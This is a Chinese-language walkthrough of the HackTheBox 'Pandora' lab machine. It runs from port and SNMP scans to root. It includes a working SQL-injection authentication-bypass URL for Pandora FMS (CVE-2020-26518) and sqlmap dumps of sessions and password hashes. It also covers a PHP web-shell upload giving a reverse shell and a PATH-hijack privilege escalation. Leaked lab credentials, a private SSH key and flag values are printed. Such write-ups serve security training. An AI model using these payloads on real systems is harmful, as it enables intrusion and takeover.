Hackthebox - Pandora
靶场信息
靶场类型
信息搜集
首先使用nmap进行端口扫描
┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.136
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 02:29 EST
Nmap scan report for 10.10.11.136
Host is up (0.22s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/17%OT=22%CT=1%CU=41376%PV=Y%DS=2%DC=T%G=Y%TM=61E51AF
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=C)SEQ
OS:(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O
OS:3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 238.86 ms 10.10.14.1
2 239.01 ms 10.10.11.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.77 seconds
将DNS解析添加到hosts
echo 10.10.11.136 pandora.htb >> /etc/hosts
然后去看一下80端口
在页面上没看到什么有用的东西,fuzz下目录看看吧
┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://pandora.htb/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://pandora.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
assets [Status: 301, Size: 311, Words: 20, Lines: 10]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10]
[Status: 200, Size: 33560, Words: 13127, Lines: 908]
:: Progress: [20116/20116] :: Job [1/1] :: 119 req/sec :: Duration: [0:03:26] :: Errors: 0 ::
也没看到什么有用的东西,有点迷惑
扫描个UDP端口看看
┌──(root💀kali)-[~/Desktop]
└─# nmap -sC -sV -sU -top-ports=20 pandora.htb 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 20:30 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp open|filtered ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 20m46s
| snmp-processes:
| 1:
|
| 2:
|
| 3:
|
|_ 4:
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 20m46.36s (124636 timeticks)
|_snmp-win32-software:
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp closed route
631/udp closed ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
Service Info: Host: pandora
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.89 seconds
这里可以看到有一个snmp开着,而且明显还有信息没有显示出来,我感觉这就是突破口
漏洞利用
使用snmpwalk扫描一下pandora.htb
snmpwalk -v 2c pandora.htb -c public > nmap
iso.3.6.1.2.1.25.4.2.1.5.870 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
得到了一个账号密码
username = daniel
password = HotelBabylon23
去ssh登录试试
┌──(root💀kali)-[~/Desktop]
└─# ssh daniel@pandora.htb
daniel@pandora.htb's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 18 Jan 01:47:00 UTC 2022
System load: 0.12 Processes: 263
Usage of /: 64.4% of 4.87GB Users logged in: 1
Memory usage: 12% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jan 18 01:12:05 2022 from 10.10.14.20
daniel@pandora:~$ whoami&&id
daniel
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
成功登录
daniel@pandora:~$ cd ../
daniel@pandora:/home$ ls
daniel matt
daniel@pandora:/home$ cd matt
daniel@pandora:/home/matt$ ls
LinEnum.sh snmp-mibs-downloader snmp-mibs-downloader_1.2.tar.xz user.txt
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
这里可以看到,有一个matt账户,并且我们没有权限访问user.txt的flag文件,那就是得想办法提权到matt用户
权限提升
Matt
查看一下端口
daniel@pandora:/home/matt$ netstat -tuplen
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 21170 -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 24732 -
tcp 0 0 0.0.0.0:5577 0.0.0.0:* LISTEN 1000 119305 -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 114 24400 -
tcp6 0 0 :::22 :::* LISTEN 0 24759 -
tcp6 0 0 :::80 :::* LISTEN 0 24585 -
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 21169 -
udp 0 0 0.0.0.0:161 0.0.0.0:* 0 24804 -
udp6 0 0 ::1:161 :::* 0 24805 -
这里好像有本地网络服务pandora,查看一下
daniel@pandora:/home/matt$ curl pandora.htb
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
确实存在,使用ssh把端口转发出来
┌──(root💀kali)-[~/Desktop]
└─# ssh -L 80:127.0.0.1:80 daniel@pandora.htb
daniel@pandora.htb's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 18 Jan 01:54:11 UTC 2022
System load: 0.0 Processes: 273
Usage of /: 64.6% of 4.87GB Users logged in: 1
Memory usage: 19% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jan 18 01:47:01 2022 from 10.10.14.17
代理成功,我们去访问一下127.0.0.1
这里发现了一个关键线索v7.0NG.742_FIX_PERL2020
去搜索一下这个版本有没有漏洞
https://nvd.nist.gov/vuln/detail/CVE-2020-26518#range-6019001
找到了一个sql注入,咱们去注入吧
┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tsessions_php -C id_session,data --dump
+----------------------------+------------------------------------------------------+
| id_session | data |
+----------------------------+------------------------------------------------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; |
| 0ahul7feb1l9db7ffp8d25sjba | NULL |
| 1um23if7s531kqf5da14kf5lvm | NULL |
| 22eqdjecn219cpni093reba8ee | NULL |
| 27ffs3tj8rpvrm2hd0juphhda7 | id_usuario|s:6:"daniel"; |
| 2e25c62vc3odbppmg6pjbf9bum | NULL |
| 2uibrnof5j1k45g9u15tngrlju | NULL |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; |
| 3me2jjab4atfa5f8106iklh4fc | NULL |
| 4f51mju7kcuonuqor3876n8o02 | NULL |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; |
| 59qae699l0971h13qmbpqahlls | NULL |
| 5fihkihbip2jioll1a8mcsmp6j | NULL |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; |
| 6ctchv9r2gg7c6arpv4cipcfol | NULL |
| 81f3uet7p3esgiq02d4cjj48rc | NULL |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; |
| 8upeameujo9nhki3ps0fu32cgd | NULL |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; |
| a3a49kc938u7od6e6mlip1ej80 | NULL |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; |
| cbo2bdg3g7vfqgjmcuc75bq0aj | NULL |
| cojb6rgubs18ipb35b3f6hf0vp | NULL |
| cor29cq7l3ae4g8a423as7p422 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| d0carbrks2lvmb90ergj7jv6po | NULL |
| dsot94harh6hraanl60m698enq | NULL |
| e58oalliogbu7jb1dc75dos90j | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; |
| fikt9p6i78no7aofn74rr71m85 | NULL |
| fqd96rcv4ecuqs409n5qsleufi | NULL |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; |
| gf40pukfdinc63nm5lkroidde6 | NULL |
| heasjj8c48ikjlvsf1uhonfesv | NULL |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; |
| idlkl6lfsk05omgp2t42b8rlq9 | id_usuario|s:6:"daniel"; |
| j4415tiqm7kck5lkovi4qocch9 | NULL |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; |
| knh7p9utl2089rprmm46nku2lr | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| kp90bu1mlclbaenaljem590ik3 | NULL |
| l5817gd0prg6udd5sb5bufcvap | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; |
| og8c3bqae2pts9i0l6c3s2u9aq | NULL |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; |
| qh9k9iaginhd7qqu7sda2ar27o | id_usuario|s:6:"daniel"; |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL |
| r02qbtlhv3uq49mv0f4a3s4k8v | NULL |
| r097jr6k9s7k166vkvaj17na1u | NULL |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; |
| v0l5i5vhf7bsk2n3k2f90nu4bi | NULL |
+----------------------------+------------------------------------------------------+
┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tpassword_history -C id_pass,id_user,data_end,password,data_begin --dump
+---------+---------+----------+----------------------------------+------------+
| id_pass | id_user | data_end | password | data_begin |
+---------+---------+----------+----------------------------------+------------+
| 1 | matt | | f655f807365b6dc602b31ab3d6d43acc | |
| 2 | daniel | | 76323c174bd49ffbbdedf678f6cc89a6 | |
+---------+---------+----------+----------------------------------+------------+
首先使用如下poc进行跳过
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO
然后直接访问http://127.0.0.1/pandora_console/即可以admin权限进行登录
选择 Admin tools -> File manager
使用该shell,先保存到本地然后稍微修改一下
然后upload file上传
传上去后在http://127.0.0.1/pandora_console/images/phpshell.php可以找到shell
本地启动一个nc监听端口,然后访问该shell
┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.11.136] 58582
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
03:15:11 up 15 min, 4 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.14.17 03:00 14:23 0.03s 0.03s -bash
daniel pts/1 10.10.14.20 03:01 11:35 0.26s 0.21s python3 sqlpwn.py -t localhost
daniel pts/2 10.10.14.128 03:02 11.00s 0.20s 0.02s ssh -L 8000:localhost:80 daniel@pandora.htb
daniel pts/4 127.0.0.1 03:14 15.00s 0.02s 0.02s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ whoami&&id
matt
uid=1000(matt) gid=1000(matt) groups=1000(matt)
成功拿到matt权限的shell
$ cat user.txt
083fe340ff06c9a855f56ee98eaa62fd
成功拿到user权限的flag文件
Root
matt@pandora:/home/matt$ find / -perm -u=s 2> /dev/null
find / -perm -u=s 2> /dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
检查一下可利用文件
其中/usr/bin/pandora_backup可利用
matt@pandora:/home/matt$ sudo /usr/bin/pandora_backup
sudo /usr/bin/pandora_backup
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
直接利用会错误,我们需要一个更加稳定的shell
由于我们没有matt的密码,所以无法直接用ssh登录,也没找到ssh的秘钥,所以我们自己生成一个
matt@pandora:/home/matt$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/matt/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/matt/.ssh/id_rsa
Your public key has been saved in /home/matt/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:SDMstiuKB3DRqypXDzX385OV0v8MrIh+lQE0alNduQ4 matt@pandora
The key's randomart image is:
+---[RSA 3072]----+
| . .+. ... |
| . .. o... . |
| .o.= + . . |
|. ...+o=.. E . |
|.. ....oS. * . |
|. . o. o +.= |
| o...o + +o. |
|+.o. . ...+. o.|
|+o .o.. .. +|
+----[SHA256]-----+
matt@pandora:/home/matt$ cd .ssh
cd .ssh
matt@pandora:/home/matt/.ssh$ ls
ls
id_rsa id_rsa.pub
matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys
cat id_rsa > authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 700 authorized_keys
chmod 600 authorized_keys
matt@pandora:/home/matt/.ssh$ cat id_rsa
cat authorized_keys
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
┌──(root💀kali)-[~/Desktop]
└─# vim id_rsa
┌──(root💀kali)-[~/Desktop]
└─# chmod 700 id_rsa
┌──(root💀kali)-[~/Desktop]
└─# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
然后使用ssh进行登录
┌──(root💀kali)-[~/Desktop]
└─# ssh matt@pandora.htb -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 18 Jan 05:59:56 UTC 2022
System load: 0.09 Processes: 280
Usage of /: 63.0% of 4.87GB Users logged in: 1
Memory usage: 9% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$ whoami&&id
matt
uid=1000(matt) gid=1000(matt) groups=1000(matt)
切换到matt的用户目录,然后创建一个假的tar可执行文件,,并将matt的家路径注入PATH变量中
cd /home/matt/
echo "/bin/bash" > tar
chmod +x tar
export PATH=/home/matt:$PATH
然后运行/usr/bin/pandora_backup文件
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~# whoami&&id
root
uid=0(root) gid=1000(matt) groups=1000(matt)
成功提权到root用户
root@pandora:~# cd /root
root@pandora:/root# ls
root.txt
root@pandora:/root# cat root.txt
262d5cfca2599a11b0c1dcfa552a150e
成功拿到root权限的flag文件